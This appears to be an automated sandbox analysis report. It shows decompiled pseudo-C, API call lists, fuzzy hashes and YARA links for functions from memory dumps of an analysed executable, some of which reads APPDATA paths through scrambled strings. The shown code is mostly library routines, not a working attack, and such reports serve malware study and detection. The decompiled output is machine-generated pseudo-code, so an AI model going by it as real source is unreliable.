                                                                                                                0x0127313c
                                                                                                                0x0127313f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01273148
                                                                                                                0x0127314b
                                                                                                                0x01273155
                                                                                                                0x00000000
                                                                                                                0x01273354
                                                                                                                0x0127335d
                                                                                                                0x01273362
                                                                                                                0x01273369
                                                                                                                0x0127336e
                                                                                                                0x0127336e
                                                                                                                0x00000000
                                                                                                                0x01273044
                                                                                                                0x01272fd5
                                                                                                                0x00000000
                                                                                                                0x01272f7c

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 01272F1D
                                                                                                                  • Part of subcall function 01272080: __EH_prolog3.LIBCMT ref: 01272111
                                                                                                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 012730ED
                                                                                                                • SendMessageA.USER32(?,0000000B,?,00000000), ref: 01273241
                                                                                                                • InvalidateRect.USER32(?,00000000,?), ref: 0127325B
                                                                                                                • UpdateWindow.USER32(?), ref: 01273271
                                                                                                                • SendMessageA.USER32(?,0000000B,?,00000000), ref: 012732F6
                                                                                                                • InvalidateRect.USER32(?,00000000,?), ref: 01273310
                                                                                                                • UpdateWindow.USER32(?), ref: 01273326
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$InvalidateRectUpdateWindow$H_prolog3H_prolog3_
                                                                                                                • String ID: :/\
                                                                                                                • API String ID: 2441118127-2793184486
                                                                                                                • Opcode ID: 02ac1ea6274c52fafadb53fad2f3aed6cde51728ea9d38c7892d8ef89d5c066c
                                                                                                                • Instruction ID: 5036cf3eecb49678a487db90ebf3d803a13875291376844568fc15df30290f68
                                                                                                                • Opcode Fuzzy Hash: 02ac1ea6274c52fafadb53fad2f3aed6cde51728ea9d38c7892d8ef89d5c066c
                                                                                                                • Instruction Fuzzy Hash: 17D10A716201169FDB25EB64C998FEEB7B9BF55304F104199E10A9B2E1DF30AE88CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126BCA8, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 210libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 50%
                                                                                                                			E0126BCA8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed long long __fp0, intOrPtr _a8) {
				struct tagPOINT _v12;
				signed int _v16;
				signed long long _v20;
				signed int _t76;
				_Unknown_base(*)()* _t79;
				signed long long _t80;
				intOrPtr _t85;
				void* _t90;
				void* _t95;
				void* _t96;
				signed long long _t98;
				signed int _t99;
				void* _t106;
				void* _t108;
				void* _t112;
				_Unknown_base(*)()* _t119;
				signed long long _t123;
				struct HINSTANCE__* _t126;
				intOrPtr _t129;
				intOrPtr _t131;
				signed int _t134;
				signed int _t135;
				struct HWND__* _t140;
				void* _t145;
				intOrPtr* _t150;
				void* _t155;
				void* _t156;
				long long* _t158;
				signed long long _t179;

				_t179 = __fp0;
				_t76 =  *0x1389bf4; // 0x0
				_t156 = _t155 - 0x10;
				_push(__ebx);
				_t150 = __ecx;
				_t145 = 1;
				if((_t76 & 0x00000001) != 0) {
					_t126 =  *0x1389bf0; // 0x0
				} else {
					 *0x1389bf4 = _t76 | 1;
					_t126 = GetModuleHandleW(L"user32.dll");
					_t76 =  *0x1389bf4; // 0x0
					 *0x1389bf0 = _t126;
				}
				if(_t126 == 0) {
					E01268275(_t126);
					asm("int3");
					__eflags = 0;
					return 0;
				} else {
					_t123 = GetProcAddress;
					if((_t76 & 0x00000002) == 0) {
						 *0x1389bf4 = _t76 | 0x00000002;
						_t119 = GetProcAddress(_t126, "GetGestureInfo");
						_t126 =  *0x1389bf0; // 0x0
						 *0x1389bf8 = _t119;
						_t76 =  *0x1389bf4; // 0x0
					}
					if((_t76 & 0x00000004) != 0) {
						_t79 =  *0x1389bfc; // 0x0
					} else {
						 *0x1389bf4 = _t76 | 0x00000004;
						_t79 = GetProcAddress(_t126, "CloseGestureInfoHandle");
						 *0x1389bfc = _t79;
					}
					if( *0x1389bf8 == 0 || _t79 == 0) {
						L36:
						_t80 = E0126B107(_t123, _t150);
					} else {
						_t123 = 0;
						_t167 =  *((intOrPtr*)(_t150 + 0x50));
						if( *((intOrPtr*)(_t150 + 0x50)) == 0) {
							 *((intOrPtr*)(_t150 + 0x50)) = E01262C72(_t167, 0x30);
						}
						E01283870( *((intOrPtr*)(_t150 + 0x50)), _t123, 0x30);
						_t158 = _t156 + 0xc;
						 *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x50)))) = 0x30;
						_push( *((intOrPtr*)(_t150 + 0x50)));
						_push(_a8);
						if( *0x1389bf8() == 0) {
							L34:
							_push(0x30);
							_push(_t123);
							_push( *((intOrPtr*)(_t150 + 0x50)));
							goto L35;
						} else {
							_t85 =  *((intOrPtr*)(_t150 + 0x50));
							_t140 =  *(_t150 + 0x20);
							if( *((intOrPtr*)(_t85 + 0xc)) != _t140) {
								goto L34;
							} else {
								_v12.x =  *((short*)(_t85 + 0x10));
								_v12.y =  *((short*)(_t85 + 0x12));
								ScreenToClient(_t140,  &_v12);
								_t129 =  *((intOrPtr*)(_t150 + 0x50));
								_t90 =  *((intOrPtr*)(_t129 + 8)) - 1;
								if(_t90 == 0) {
									 *(_t150 + 0x3c) = _v12.x;
									 *(_t150 + 0x40) = _v12.y;
									 *(_t150 + 0x44) =  *(_t129 + 0x20);
									 *(_t150 + 0x48) =  *(_t129 + 0x24);
									goto L36;
								} else {
									_t95 = _t90 - 1;
									if(_t95 == 0) {
										 *(_t150 + 0x3c) =  *(_t150 + 0x3c) | 0xffffffff;
										 *(_t150 + 0x40) =  *(_t150 + 0x40) | 0xffffffff;
										_push(0x30);
										_push(_t123);
										 *(_t150 + 0x44) = _t123;
										 *(_t150 + 0x48) = _t123;
										_push(_t129);
										L35:
										E01283870();
										goto L36;
									} else {
										_t96 = _t95 - 1;
										if(_t96 == 0) {
											_t98 =  *(_t129 + 0x20) -  *(_t150 + 0x44);
											__eflags = _t98;
											_t99 =  *((intOrPtr*)( *_t150 + 0x134))(_v12.x, _v12.y, _t98);
											goto L27;
										} else {
											_t106 = _t96 - 1;
											if(_t106 == 0) {
												_t99 =  *((intOrPtr*)( *_t150 + 0x138))( *(_t150 + 0x3c),  *(_t150 + 0x40), _v12.x, _v12.y);
												goto L27;
											} else {
												_t108 = _t106 - 1;
												if(_t108 == 0) {
													_t134 =  *(_t129 + 0x24);
													_v20 =  *(_t129 + 0x20);
													_t135 = _t134 & 0x7fffffff;
													_v16 = _t135;
													asm("fild qword [ebp-0x10]");
													_v16 = _t134 & 0x80000000;
													_v20 = _t123;
													asm("fild qword [ebp-0x10]");
													asm("fchs");
													asm("faddp st1, st0");
													_v20 = _t179;
													 *_t158 = _v20 /  *0x129b1a8 *  *0x129b198 *  *0x129b190 -  *0x129b1a0;
													_t99 =  *((intOrPtr*)( *_t150 + 0x13c))(_v12.x, _v12.y, _t135, _t135);
													goto L27;
												} else {
													_t112 = _t108 - 1;
													if(_t112 == 0) {
														_t99 =  *((intOrPtr*)( *_t150 + 0x140))(_v12.x, _v12.y);
														goto L27;
													} else {
														if(_t112 == 1) {
															_t99 =  *((intOrPtr*)( *_t150 + 0x144))(_v12.x, _v12.y,  *(_t129 + 0x20));
															L27:
															asm("sbb edi, edi");
															_t145 =  ~_t99 + 1;
															if(_t145 == 0) {
																 *0x1389bfc(_a8);
															}
														}
													}
												}
											}
										}
										_t131 =  *((intOrPtr*)(_t150 + 0x50));
										 *(_t150 + 0x3c) = _v12.x;
										 *(_t150 + 0x40) = _v12.y;
										 *(_t150 + 0x44) =  *(_t131 + 0x20);
										 *(_t150 + 0x48) =  *(_t131 + 0x24);
										if(_t145 != 0) {
											_t123 = E0126B107(_t123, _t150);
										}
										_t80 = _t123;
									}
								}
							}
						}
					}
					return _t80;
				}
			}
































                                                                                                                0x0126bca8
                                                                                                                0x0126bcab
                                                                                                                0x0126bcb0
                                                                                                                0x0126bcb3
                                                                                                                0x0126bcb8
                                                                                                                0x0126bcba
                                                                                                                0x0126bcbd
                                                                                                                0x0126bce0
                                                                                                                0x0126bcbf
                                                                                                                0x0126bcc6
                                                                                                                0x0126bcd1
                                                                                                                0x0126bcd3
                                                                                                                0x0126bcd8
                                                                                                                0x0126bcd8
                                                                                                                0x0126bce8
                                                                                                                0x0126bf27
                                                                                                                0x0126bf2c
                                                                                                                0x0126bf2d
                                                                                                                0x0126bf2f
                                                                                                                0x0126bcee
                                                                                                                0x0126bcee
                                                                                                                0x0126bcf6
                                                                                                                0x0126bd01
                                                                                                                0x0126bd06
                                                                                                                0x0126bd08
                                                                                                                0x0126bd0e
                                                                                                                0x0126bd13
                                                                                                                0x0126bd13
                                                                                                                0x0126bd1a
                                                                                                                0x0126bd33
                                                                                                                0x0126bd1c
                                                                                                                0x0126bd25
                                                                                                                0x0126bd2a
                                                                                                                0x0126bd2c
                                                                                                                0x0126bd2c
                                                                                                                0x0126bd3f
                                                                                                                0x0126bf17
                                                                                                                0x0126bf19
                                                                                                                0x0126bd4d
                                                                                                                0x0126bd4d
                                                                                                                0x0126bd4f
                                                                                                                0x0126bd52
                                                                                                                0x0126bd5c
                                                                                                                0x0126bd5c
                                                                                                                0x0126bd65
                                                                                                                0x0126bd6d
                                                                                                                0x0126bd70
                                                                                                                0x0126bd76
                                                                                                                0x0126bd79
                                                                                                                0x0126bd84
                                                                                                                0x0126bf09
                                                                                                                0x0126bf09
                                                                                                                0x0126bf0b
                                                                                                                0x0126bf0c
                                                                                                                0x00000000
                                                                                                                0x0126bd8a
                                                                                                                0x0126bd8a
                                                                                                                0x0126bd8d
                                                                                                                0x0126bd93
                                                                                                                0x00000000
                                                                                                                0x0126bd99
                                                                                                                0x0126bda1
                                                                                                                0x0126bda9
                                                                                                                0x0126bdac
                                                                                                                0x0126bdb2
                                                                                                                0x0126bdb8
                                                                                                                0x0126bdb9
                                                                                                                0x0126bef2
                                                                                                                0x0126bef8
                                                                                                                0x0126befe
                                                                                                                0x0126bf04
                                                                                                                0x00000000
                                                                                                                0x0126bdbf
                                                                                                                0x0126bdbf
                                                                                                                0x0126bdc0
                                                                                                                0x0126bedb
                                                                                                                0x0126bedf
                                                                                                                0x0126bee3
                                                                                                                0x0126bee5
                                                                                                                0x0126bee6
                                                                                                                0x0126bee9
                                                                                                                0x0126beec
                                                                                                                0x0126bf0f
                                                                                                                0x0126bf0f
                                                                                                                0x00000000
                                                                                                                0x0126bdc6
                                                                                                                0x0126bdc6
                                                                                                                0x0126bdc7
                                                                                                                0x0126be89
                                                                                                                0x0126be89
                                                                                                                0x0126be95
                                                                                                                0x00000000
                                                                                                                0x0126bdcd
                                                                                                                0x0126bdcd
                                                                                                                0x0126bdce
                                                                                                                0x0126be7c
                                                                                                                0x00000000
                                                                                                                0x0126bdd4
                                                                                                                0x0126bdd4
                                                                                                                0x0126bdd5
                                                                                                                0x0126be11
                                                                                                                0x0126be16
                                                                                                                0x0126be1b
                                                                                                                0x0126be26
                                                                                                                0x0126be29
                                                                                                                0x0126be2c
                                                                                                                0x0126be2f
                                                                                                                0x0126be33
                                                                                                                0x0126be39
                                                                                                                0x0126be3b
                                                                                                                0x0126be3d
                                                                                                                0x0126be5b
                                                                                                                0x0126be64
                                                                                                                0x00000000
                                                                                                                0x0126bdd7
                                                                                                                0x0126bdd7
                                                                                                                0x0126bdd8
                                                                                                                0x0126be03
                                                                                                                0x00000000
                                                                                                                0x0126bdda
                                                                                                                0x0126bddb
                                                                                                                0x0126bdee
                                                                                                                0x0126be9b
                                                                                                                0x0126be9f
                                                                                                                0x0126bea1
                                                                                                                0x0126bea4
                                                                                                                0x0126bea9
                                                                                                                0x0126bea9
                                                                                                                0x0126bea4
                                                                                                                0x0126bddb
                                                                                                                0x0126bdd8
                                                                                                                0x0126bdd5
                                                                                                                0x0126bdce
                                                                                                                0x0126beaf
                                                                                                                0x0126beb5
                                                                                                                0x0126bebb
                                                                                                                0x0126bec1
                                                                                                                0x0126bec7
                                                                                                                0x0126becc
                                                                                                                0x0126bed5
                                                                                                                0x0126bed5
                                                                                                                0x0126bed7
                                                                                                                0x0126bed7
                                                                                                                0x0126bdc0
                                                                                                                0x0126bdb9
                                                                                                                0x0126bd93
                                                                                                                0x0126bd84
                                                                                                                0x0126bf24
                                                                                                                0x0126bf24

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(user32.dll), ref: 0126BCCB
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 0126BD06
                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseGestureInfoHandle), ref: 0126BD2A
                                                                                                                • _memset.LIBCMT ref: 0126BD65
                                                                                                                • ScreenToClient.USER32 ref: 0126BDAC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ClientHandleModuleScreen_memset
                                                                                                                • String ID: CloseGestureInfoHandle$GetGestureInfo$user32.dll
                                                                                                                • API String ID: 336727641-2905070798
                                                                                                                • Opcode ID: 5847cc75529988005ebbcf730b2e3a9a699097767ba1200fb117bf61bb160fc0
                                                                                                                • Instruction ID: 23f4eb6ca9c8e151ce116cc337817cf43147586a8161f94c986b75dea73df4f3
                                                                                                                • Opcode Fuzzy Hash: 5847cc75529988005ebbcf730b2e3a9a699097767ba1200fb117bf61bb160fc0
                                                                                                                • Instruction Fuzzy Hash: D5818D74A20706EFCB25CF68D884A6ABBF9FB48314B50056CE656D76A0DB31E991CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126AA72, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0126AA72(void* __ebx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				short _v532;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t12;
				int _t14;
				int _t16;
				signed int _t20;
				int _t26;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t29;
				void* _t30;
				void* _t34;
				WCHAR* _t35;
				int _t36;
				signed int _t37;
				void* _t38;

				_t34 = __edx;
				_t30 = __ebx;
				_t12 =  *0x12aa3f0; // 0xddd5d539
				_v8 = _t12 ^ _t37;
				_t14 =  *0x1389bc4; // 0x0
				_t35 = _a4;
				if(_t14 != 0) {
					__imp__DecodePointer(_t14);
					_t36 = _t14;
					goto L4;
				} else {
					_t28 = GetModuleHandleW(L"kernel32.dll");
					if(_t28 == 0) {
						L6:
						_t36 = 0x105;
						_t16 = GetSystemDirectoryW( &_v532, 0x105);
						__eflags = _t16;
						if(_t16 == 0) {
							L12:
							__eflags = 0;
						} else {
							__eflags = _t16 - 0x105;
							if(_t16 >= 0x105) {
								goto L12;
							} else {
								_t20 = E01285715( &_v532);
								__eflags =  *((short*)(_t37 + _t20 * 2 - 0x212)) - 0x5c;
								if( *((short*)(_t37 + _t20 * 2 - 0x212)) == 0x5c) {
									L10:
									__eflags = E01286686( &_v532, _t36, _t35);
									if(__eflags != 0) {
										goto L12;
									} else {
										_push( &_v532);
										E0126F0BA(_t30, _t35, _t36, __eflags);
									}
								} else {
									_t26 = E01286686( &_v532, 0x105, "\\");
									_t38 = _t38 + 0xc;
									__eflags = _t26;
									if(_t26 != 0) {
										goto L12;
									} else {
										goto L10;
									}
								}
							}
						}
					} else {
						_t29 = GetProcAddress(_t28, "SetDefaultDllDirectories");
						_t36 = _t29;
						__imp__EncodePointer(_t36);
						 *0x1389bc4 = _t29;
						L4:
						if(_t36 == 0) {
							goto L6;
						} else {
							LoadLibraryExW(_t35, 0, 0x800);
						}
					}
				}
				return E012833E5(_t30, _v8 ^ _t37, _t34, _t35, _t36);
			}





















                                                                                                                0x0126aa72
                                                                                                                0x0126aa72
                                                                                                                0x0126aa7b
                                                                                                                0x0126aa82
                                                                                                                0x0126aa85
                                                                                                                0x0126aa8c
                                                                                                                0x0126aa91
                                                                                                                0x0126aabf
                                                                                                                0x0126aac5
                                                                                                                0x00000000
                                                                                                                0x0126aa93
                                                                                                                0x0126aa98
                                                                                                                0x0126aaa0
                                                                                                                0x0126aadb
                                                                                                                0x0126aadb
                                                                                                                0x0126aae8
                                                                                                                0x0126aaee
                                                                                                                0x0126aaf0
                                                                                                                0x0126ab4a
                                                                                                                0x0126ab4a
                                                                                                                0x0126aaf2
                                                                                                                0x0126aaf2
                                                                                                                0x0126aaf4
                                                                                                                0x00000000
                                                                                                                0x0126aaf6
                                                                                                                0x0126aafd
                                                                                                                0x0126ab03
                                                                                                                0x0126ab0c
                                                                                                                0x0126ab27
                                                                                                                0x0126ab38
                                                                                                                0x0126ab3a
                                                                                                                0x00000000
                                                                                                                0x0126ab3c
                                                                                                                0x0126ab42
                                                                                                                0x0126ab43
                                                                                                                0x0126ab43
                                                                                                                0x0126ab0e
                                                                                                                0x0126ab1b
                                                                                                                0x0126ab20
                                                                                                                0x0126ab23
                                                                                                                0x0126ab25
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126ab25
                                                                                                                0x0126ab0c
                                                                                                                0x0126aaf4
                                                                                                                0x0126aaa2
                                                                                                                0x0126aaa8
                                                                                                                0x0126aaae
                                                                                                                0x0126aab1
                                                                                                                0x0126aab7
                                                                                                                0x0126aac7
                                                                                                                0x0126aac9
                                                                                                                0x00000000
                                                                                                                0x0126aacb
                                                                                                                0x0126aad3
                                                                                                                0x0126aad3
                                                                                                                0x0126aac9
                                                                                                                0x0126aaa0
                                                                                                                0x0126ab5b

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 0126AA98
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0126AAA8
                                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000), ref: 0126AAB1
                                                                                                                • DecodePointer.KERNEL32(00000000,?,00000000), ref: 0126AABF
                                                                                                                • LoadLibraryExW.KERNEL32(00000028,00000000,00000800,?,00000000), ref: 0126AAD3
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0126AAE8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Pointer$AddressDecodeDirectoryEncodeHandleLibraryLoadModuleProcSystem
                                                                                                                • String ID: SetDefaultDllDirectories$\$kernel32.dll
                                                                                                                • API String ID: 4227638471-3881611067
                                                                                                                • Opcode ID: 31ba4a723487ab3b0e731bae1b1bdd4cb290970129f54052879cea6ecc717840
                                                                                                                • Instruction ID: 89d63f0e764c20d90ab6b34af4a1bbf1194f369c70568c88e3e0fa0b6c535414
                                                                                                                • Opcode Fuzzy Hash: 31ba4a723487ab3b0e731bae1b1bdd4cb290970129f54052879cea6ecc717840
                                                                                                                • Instruction Fuzzy Hash: 5821CB7196121997DB20EB79AD4CFBE77BCEF24714F0408A9E905E3184F670D9C48B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10009C66, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10009C8A
                                                                                                                • _memset.LIBCMT ref: 10009C99
                                                                                                                • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104,?,?,?,?,?,00000000), ref: 10009CB3
                                                                                                                  • Part of subcall function 10007B5C: __vsnprintf_s.LIBCMT ref: 10007B71
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 10009CFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memset$EnvironmentPrivateProfileStringVariable__vsnprintf_s
                                                                                                                • String ID: %9\D5OZyyH\aZEIM5S\%9$%9\D5OZyyH\aZEIM5S\PE5MZyI9.Z1Z$3E5MZyIj$APPDATA$Path
                                                                                                                • API String ID: 2911482467-2959586481
                                                                                                                • Opcode ID: 65f2f0a15c56b8a4898ee75907e667b26cfc99210045aca7c49042bb1db22c3e
                                                                                                                • Instruction ID: 45b97f6f97d3560b5bf55248adb548529aa7424532490adda968a22043139c9e
                                                                                                                • Opcode Fuzzy Hash: 65f2f0a15c56b8a4898ee75907e667b26cfc99210045aca7c49042bb1db22c3e
                                                                                                                • Instruction Fuzzy Hash: A61133B9D4122C7ADB10D7949D49FFBB77CDB41210F1045E6BA08E3102DA356B458BB5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100073AC, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100073B3
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 100073BD
                                                                                                                  • Part of subcall function 100612C6: __lock.LIBCMT ref: 100612D7
                                                                                                                • int.LIBCPMT ref: 100073D4
                                                                                                                  • Part of subcall function 100018BA: std::_Lockit::_Lockit.LIBCPMT ref: 100018CB
                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 100073DD
                                                                                                                • ctype.LIBCPMT ref: 100073F7
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 1000740B
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10007419
                                                                                                                • std::_Facet_Register.LIBCPMT ref: 1000742F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prolog3RegisterThrow__lockctypestd::bad_exception::bad_exceptionstd::locale::_
                                                                                                                • String ID: bad cast
                                                                                                                • API String ID: 2017145326-3145022300
                                                                                                                • Opcode ID: 8e197d98490cab04a5a5608974aa45e4997f10f4ff0be35da709a0429725c715
                                                                                                                • Instruction ID: fa873981a39a5ceab073720cd9aab4302899dce502cd91f7eff8e33382e424d7
                                                                                                                • Opcode Fuzzy Hash: 8e197d98490cab04a5a5608974aa45e4997f10f4ff0be35da709a0429725c715
                                                                                                                • Instruction Fuzzy Hash: 9C01DE3AC006699BEB00DFA4C851AEE77B5FF402A0F950509F915AB292DF38AF0187D1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01281078, Relevance: 15.4, APIs: 10, Instructions: 357memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 45%
                                                                                                                			E01281078(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t159;
				signed int _t173;
				signed short _t175;
				void* _t178;
				void* _t181;
				signed char* _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t194;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed char* _t220;
				signed char _t221;
				void* _t222;
				signed short _t227;
				signed short* _t231;
				signed int _t236;
				signed int _t237;
				signed short _t245;
				signed short* _t262;
				signed int _t263;
				signed char* _t269;
				signed short* _t270;
				signed short _t271;
				signed char* _t272;
				signed int _t274;
				signed short _t275;
				signed short _t276;
				signed char _t277;
				signed int _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t290;

				_push(0x7c);
				E01285B7A(E0129832D, __ebx, __edi, __esi);
				_t157 = __ecx;
				 *((intOrPtr*)(_t279 - 0x24)) = __ecx;
				_t231 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L81:
					return E01285B48(_t157);
				}
				 *(_t279 - 0x54) = 0;
				 *((intOrPtr*)(_t279 - 0x50)) = 0;
				 *(_t279 - 0x4c) = 0;
				 *((intOrPtr*)(_t279 - 0x48)) = 0;
				_t159 = 0x10;
				 *((intOrPtr*)(_t279 - 4)) = 0;
				E01283870(_t279 - 0x54, 0, _t159);
				_t269 =  *(_t279 + 0x18);
				_t281 = _t280 + 0xc;
				if(_t269 == 0) {
					_t274 =  *(_t279 - 0x4c);
				} else {
					_t274 = E01283900(_t269);
					 *(_t279 - 0x4c) = _t274;
				}
				 *((intOrPtr*)(_t279 - 0x20)) = 0xfffffffd;
				if(( *(_t279 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t279 - 0x48)) = 1;
					 *((intOrPtr*)(_t279 - 0x50)) = _t279 - 0x20;
				}
				E0128028F(_t279 - 0x68);
				 *((char*)(_t279 - 4)) = 1;
				_t286 = _t274;
				if(_t274 == 0) {
					L30:
					_t270 = _t231;
					E0127E554(_t279 - 0x44);
					_t275 =  *(_t279 + 0x10);
					if(_t275 != 0) {
						_t270 = _t279 - 0x44;
					}
					E01283870(_t279 - 0x88, _t231, 0x20);
					 *(_t279 - 0x28) =  *(_t279 - 0x28) | 0xffffffff;
					_t281 = _t281 + 0xc;
					_t261 = _t279 - 0x54;
					_t271 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t279 - 0x24)))))) + 0x18))(_t270, _t279 - 0x88, _t279 - 0x28);
					 *(_t279 + 0x1c) = _t271;
					E0128101E(_t231, _t279 - 0x68, _t271, _t275,  *((intOrPtr*)( *((intOrPtr*)(_t279 - 0x24)))),  *((intOrPtr*)(_t279 + 8)), 0x12a0e48, _t231,  *(_t279 + 0xc), _t279 - 0x54);
					_t236 =  *(_t279 - 0x4c);
					if(_t236 == 0) {
						L40:
						E01262C9F( *(_t279 - 0x54));
						 *(_t279 - 0x54) = _t231;
						_pop(_t237);
						if(_t271 >= 0) {
							L64:
							__eflags = _t275;
							if(_t275 == 0) {
								L79:
								_t157 = E01280340(_t279 - 0x68, _t271);
								__eflags =  *(_t279 - 0x54);
								if( *(_t279 - 0x54) != 0) {
									_t157 = E01262C9F( *(_t279 - 0x54));
								}
								goto L81;
							}
							__eflags = _t275 - 0xc;
							if(_t275 == 0xc) {
								L68:
								_t173 = (_t275 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t173 - 0x13;
								if(_t173 > 0x13) {
									goto L79;
								}
								switch( *((intOrPtr*)(_t173 * 4 +  &M01281618))) {
									case 0:
										__ecx =  *(__ebp + 0x14);
										__ax =  *(__ebp - 0x3c);
										 *__ecx =  *(__ebp - 0x3c);
										goto L79;
									case 1:
										__ecx =  *(__ebp + 0x14);
